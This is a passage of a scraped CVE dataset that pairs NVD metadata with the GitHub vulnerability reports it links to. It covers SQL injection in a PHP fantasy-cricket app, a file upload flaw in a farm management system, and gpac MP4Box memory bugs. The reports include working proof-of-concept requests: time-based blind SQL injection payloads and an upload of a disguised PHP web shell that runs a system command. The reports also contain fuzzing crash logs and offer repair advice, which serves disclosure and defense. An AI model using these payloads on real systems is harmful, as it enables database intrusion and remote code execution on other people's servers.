Cookie: PHPSESSID=6acpt4g4mfrpouji122ig6sg1s
Connection: keep-alive
uname=unknown32&email=unknown%40gmail.com&password=11111111&psw-repeat=11111111&submit_register=
---
## Vulnerability type:
+ time-based blind
## Vulnerability location:
+ 'uname' parameter
## Payload:
---
Parameter: uname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=unknown32' AND (SELECT 6062 FROM (SELECT(SLEEP(5)))RMxS) AND 'lhQs'='lhQs&email=unknown@gmail.com&password=11111111&psw-repeat=11111111&submit_register=
---
---
+
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
+ 
+ 
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | code-projects.org"Fantasy-Cricket" in PHP 1.0 "update.php" SQL injection----------CVE-2025-0563 | https://api.github.com/repos/LiuSir5211314/cve/issues/2/comments | 0 | 2025-01-17T03:20:22Z | 2025-01-23T10:28:48Z | https://github.com/LiuSir5211314/cve/issues/2 | 2,794,406,362 | 2 | 6,512 |
CVE-2025-0564 | 2025-01-19T04:15:07.090 | A vulnerability was found in code-projects Fantasy-Cricket 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /authenticate.php. The manipulation of the argument uname leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Product"
],
"url": "https://code-projects.org/"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/LiuSir5211314/-sir/issues/3"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.292525"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.292525"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.484186"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:anisha:fantasy-cricket:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "EDA23A28-2D50-44DC-B909-1D97717613D6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/LiuSir5211314/-sir/issues/3 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"LiuSir5211314",
"-sir"
] |
# code-projects.org"Fantasy-Cricket" in PHP 1.0 "authenticate.php" SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Fantasy-Cricket IN PHP, CSS, JavaScript, AND MYSQL | FREE DOWNLOAD
## Vendor Homepage
+ https://code-projects.org/fantasy-cricket-in-php-css-javascript-and-mysql-free-download/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ 刘sir
## Vulnerable File
+ authenticate.php
## VERSION(S)
+ V1.0
## Software Link
+ https://download.code-projects.org/details/044627cb-ec50-45d9-ad74-b04ab138ddbf
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'authenticate.php' file of the 'Fantasy-Cricket' project. The reason for this issue is that attackers inject malicious code from the parameter "uname" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ During the security review of the PHP "Fantasy-Cricket", discovered a critical SQL injection vulnerability in the "authenticate.php" file. This vulnerability stems from insufficient user input validation of the "uname" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.
# No login or authorization is required to exploit this vulnerability
# Vulnerability details and POC
---
POST /authenticate.php HTTP/1.1
Host: 192.168.40.70:182
Content-Length: 49
Cache-Control: max-age=0
Origin: http://192.168.40.70:182/
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.40.70:182/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=6acpt4g4mfrpouji122ig6sg1s
Connection: keep-alive
uname=unknown32&password=unknown123&submit_login=
---
## Vulnerability type:
+ time-based blind
## Vulnerability location:
+ 'uname' parameter
## Payload:
---
Parameter: uname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=unknown32' AND (SELECT 5999 FROM (SELECT(SLEEP(5)))sYLm) AND 'Bpxn'='Bpxn&password=unknown123&submit_login=
---
---
+ 
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
+ 
+ 
+ 
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | # code-projects.org"Fantasy-Cricket" in PHP 1.0 "authenticate.php" SQL injection ---------------CVE-2025-0564 | https://api.github.com/repos/LiuSir5211314/cve/issues/3/comments | 0 | 2025-01-17T03:23:16Z | 2025-01-23T10:27:43Z | https://github.com/LiuSir5211314/cve/issues/3 | 2,794,412,021 | 3 | 6,513 |
CVE-2025-0582 | 2025-01-20T03:15:08.930 | A vulnerability classified as critical was found in itsourcecode Farm Management System up to 1.0. This vulnerability affects unknown code of the file /add-pig.php. The manipulation of the argument pigphoto leads to unrestricted upload. The attack can be initiated remotely. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "MULTIPLE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 6.4,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.1,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "HIGH",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/yunhai666/cve/issues/2"
},
{
"source": "cna@vuldb.com",
"tags": [
"Product"
],
"url": "https://itsourcecode.com/"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.292600"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.292600"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.484909"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:angeljudesuarez:tailoring_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D6D27827-5554-4FAB-8460-52599930F4FF",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/yunhai666/cve/issues/2 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"yunhai666",
"cve"
] | # Itsourcecode Farm Management System In PHP v1.0 add-pig.php Arbitrary Code Injection
# NAME OF AFFECTED PRODUCT(S)
- Farm Management System In PHP
## Vendor Homepage
- https://itsourcecode.com/free-projects/php-project/farm-management-system-in-php-with-source-code/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
- zzq,xiongbaojiang
## Vulnerable File
- add-pig.php
## VERSION(S)
- V1.0
## Software Link
- https://itsourcecode.com/wp-content/uploads/2021/03/Farm-Management-System-In-PHP-Source-Code.zip
# PROBLEM TYPE
## Vulnerability Type
- Code injection
## Root Cause
In the `add-pig.php` file of the "Farm Management System In PHP" project, attackers can upload malicious code files through the parameter `$res1_name`. Due to the lack of proper validation and sanitation of the uploaded files, attackers are able to directly upload malicious files to the server, leading to the risk of arbitrary code execution.
### Vulnerability Path
In the `add-pig.php` file of the "Farm Management System In PHP" project, attackers can upload malicious code files through the parameter `$res1_name`. Due to the lack of proper validation and sanitation of the uploaded files, attackers are able to directly upload malicious files to the server, leading to the risk of arbitrary code execution.
**Key Parameter**:
- **Parameter**: `$res1_name`
- **File Name**: `farm management system/add-pig.php`
- **Line Number**: 37
```
$res1_name = basename($_FILES['pigphoto']['name']);
```
**File Upload**:
- **Trigger Path**: Arbitrary File Upload/Write
- **File Name**: `farm management system/add-pig.php`
- **Line Number**: 45
```
$move = move_uploaded_file($tmp_name, $location.$res1_name);
```

# Vulnerability POC
```
POST /farm123/add-pig.php HTTP/1.1
Host: farm
Content-Type: multipart/form-data; boundary=---------------------------85676068117477891701865867569
Content-Length: 1468
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="pigno"
pig-fms-2793
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="weight"
1
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="arrived"
2024-12-17
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="gender"
male
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="status"
active
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="breed"
23
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="remark"
1
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="pigphoto"; filename="test.php"
Content-Type: application/octet-stream
GIF89a;
<?php
system('whoami');
?>
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="submit"
-----------------------------85676068117477891701865867569--
```
## Payload:
```
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="pigphoto"; filename="test.php"
Content-Type: application/octet-stream
GIF89a;
<?php
system('whoami');
?>
```
## The following are screenshots of some specific information obtained from testing and running with the yakit tool:


```
/uploadfolder/test.php
```

## Recommendations for Vulnerability Mitigation
1. **File Type Validation**: Limit the allowed file types (e.g., only allow image formats) before processing uploads.
2. **File Name Sanitization**: Clean and rename uploaded files to avoid using user-provided names directly.
3. **Use Temporary Directory**: Store uploaded files in a temporary directory and conduct security checks after processing.
4. **Permission Control**: Ensure correct permission settings on the upload directory to prevent direct execution of uploaded files.
5. **Input Validation**: Rigorously validate all user inputs to ensure security. | Itsourcecode Farm Management System In PHP v1.0 add-pig.php Code Injection | https://api.github.com/repos/yunhai666/cve/issues/2/comments | 0 | 2025-01-18T11:11:56Z | 2025-01-18T11:11:56Z | https://github.com/yunhai666/cve/issues/2 | 2,796,923,265 | 2 | 6,514 |
CVE-2024-50664 | 2025-01-23T22:15:13.667 | gpac 2.4 contains a heap-buffer-overflow at isomedia/sample_descs.c:1799 in gf_isom_new_mpha_description in gpac/MP4Box. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2988"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2988"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:2.4:*:*:*:*:*:*:*",
"matchCriteriaId": "42CFA40F-9987-4AB6-B61F-DAA3D8E7CB64",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/gpac/gpac/issues/2988 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"gpac",
"gpac"
] | ### Description
Dear developers,
We found the following heap buffer overflow bug on gpac(version 2.4), please confirm.
The latest master branch and version 2.4 both have this bug.
### Version
```shell
MP4Box - GPAC version 2.4-rev0-g5d70253ac-HEAD
```
### ASAN Log
Fuzz Trigger command 1:
./bin/gcc/MP4Box -dash 1000 -ps -dref -out /dev/null poc8gpac
Fuzz Trigger command 2:
./bin/gcc/MP4Box -dash 500 -bo -bound -keep-utc -out /dev/null poc9gpac
Normal command:
./bin/gcc/MP4Box -dash 500 -out /dev/null poc9gpac
```shell
=================================================================
==3389396==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000003751 at pc 0x7f740dee42c3 bp 0x7ffc60ecac00 sp 0x7ffc60eca3a8
WRITE of size 14 at 0x602000003751 thread T0
#0 0x7f740dee42c2 in __interceptor_memcpy ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827
#1 0x7f740ab53e89 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:29
#2 0x7f740ab53e89 in gf_isom_new_mpha_description isomedia/sample_descs.c:1799
#3 0x7f740b6737ce in mp4_mux_setup_pid filters/mux_isom.c:3055
#4 0x7f740b2738f9 in gf_filter_pid_configure filter_core/filter_pid.c:893
#5 0x7f740b27c61e in gf_filter_pid_connect_task filter_core/filter_pid.c:1260
#6 0x7f740b2c3104 in gf_fs_thread_proc filter_core/filter_session.c:2144
#7 0x7f740b2c7fce in gf_fs_run filter_core/filter_session.c:2451
#8 0x7f740ac500ae in gf_dasher_process media_tools/dash_segmenter.c:1255
#9 0x55ba9e0366d5 in do_dash /gpac2.4/applications/mp4box/mp4box.c:4832
#10 0x55ba9e055617 in mp4box_main /gpac2.4/applications/mp4box/mp4box.c:6256
#11 0x7f740817bd8f (/lib/x86_64-linux-gnu/libc.so.6+0x29d8f)
#12 0x7f740817be3f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x29e3f)
#13 0x55ba9e02ff04 in _start (/gpac2.4/bin/gcc/MP4Box+0xadf04)
0x602000003751 is located 0 bytes to the right of 1-byte region [0x602000003750,0x602000003751)
allocated by thread T0 here:
#0 0x7f740df5e887 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x7f740ab53dd7 in gf_isom_new_mpha_description isomedia/sample_descs.c:1797
#2 0x7f740b6737ce in mp4_mux_setup_pid filters/mux_isom.c:3055
#3 0x7f740b2738f9 in gf_filter_pid_configure filter_core/filter_pid.c:893
#4 0x7f740b27c61e in gf_filter_pid_connect_task filter_core/filter_pid.c:1260
#5 0x7f740b2c3104 in gf_fs_thread_proc filter_core/filter_session.c:2144
#6 0x7f740b2c7fce in gf_fs_run filter_core/filter_session.c:2451
#7 0x7f740ac500ae in gf_dasher_process media_tools/dash_segmenter.c:1255
#8 0x55ba9e0366d5 in do_dash /gpac2.4/applications/mp4box/mp4box.c:4832
#9 0x55ba9e055617 in mp4box_main /gpac2.4/applications/mp4box/mp4box.c:6256
#10 0x7f740817bd8f (/lib/x86_64-linux-gnu/libc.so.6+0x29d8f)
SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827 in __interceptor_memcpy
Shadow bytes around the buggy address:
0x0c047fff8690: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
0x0c047fff86a0: fa fa 00 00 fa fa 00 00 fa fa fd fa fa fa 00 00
0x0c047fff86b0: fa fa 00 00 fa fa 00 01 fa fa 02 fa fa fa 00 00
0x0c047fff86c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
0x0c047fff86d0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 04 fa
=>0x0c047fff86e0: fa fa 00 00 fa fa 00 00 fa fa[01]fa fa fa fa fa
0x0c047fff86f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8700: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8710: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8720: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8730: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==3389396==ABORTING
```
### Reproduction
```shell
git clone https://github.com/gpac/gpac.git
cd gpac
./configure --enable-sanitizer
make -j24
./bin/gcc/MP4Box -dash 1000 -ps -dref -out /dev/null poc8gpac
# OR
./bin/gcc/MP4Box -dash 500 -bo -bound -keep-utc -out /dev/null poc9gpac
```
### PoC
poc8gpac: https://github.com/Frank-Z7/z-vulnerabilitys/blob/main/poc8gpac
poc9gpac: https://github.com/Frank-Z7/z-vulnerabilitys/blob/main/poc9gpac
### Reference
https://github.com/gpac/gpac
### Environment
```
ubuntu:20.04
gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2)
clang version 10.0.0-4ubuntu1
afl-cc++4.09
```
*Thanks* *for* *your* *time*! | heap-buffer-overflow at isomedia/sample_descs.c:1799 in gf_isom_new_mpha_description in gpac/MP4Box | https://api.github.com/repos/gpac/gpac/issues/2988/comments | 0 | 2024-10-07T12:09:15Z | 2024-10-09T11:45:53Z | https://github.com/gpac/gpac/issues/2988 | 2,570,257,093 | 2,988 | 6,515 |
CVE-2024-50665 | 2025-01-23T22:15:13.790 | gpac 2.4 contains a SEGV at src/isomedia/drm_sample.c:1562:96 in isom_cenc_get_sai_by_saiz_saio in MP4Box. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2987"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2987"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:2.4:*:*:*:*:*:*:*",
"matchCriteriaId": "42CFA40F-9987-4AB6-B61F-DAA3D8E7CB64",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/gpac/gpac/issues/2987 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"gpac",
"gpac"
] | ### Description
Dear developers,
We found the following segmentation violation bug on gpac(version 2.4), please confirm.
This may be due to a Segmentation violation caused by dereferencing a null pointer, which can sometimes lead to a crash.
The latest master branch and version 2.4 both have this bug.
```
isomedia/drm_sample.c:1562:118: runtime error: load of null pointer of type 'u8'
```
### Version
```shell
MP4Box - GPAC version 2.4-rev0-g5d70253ac-HEAD
```
### ASAN Log
./bin/gcc/MP4Box -dash 1000 -mvex-after-traks -daisy-chain -out /dev/null poc7gpac
```shell
AddressSanitizer:DEADLYSIGNAL
=================================================================
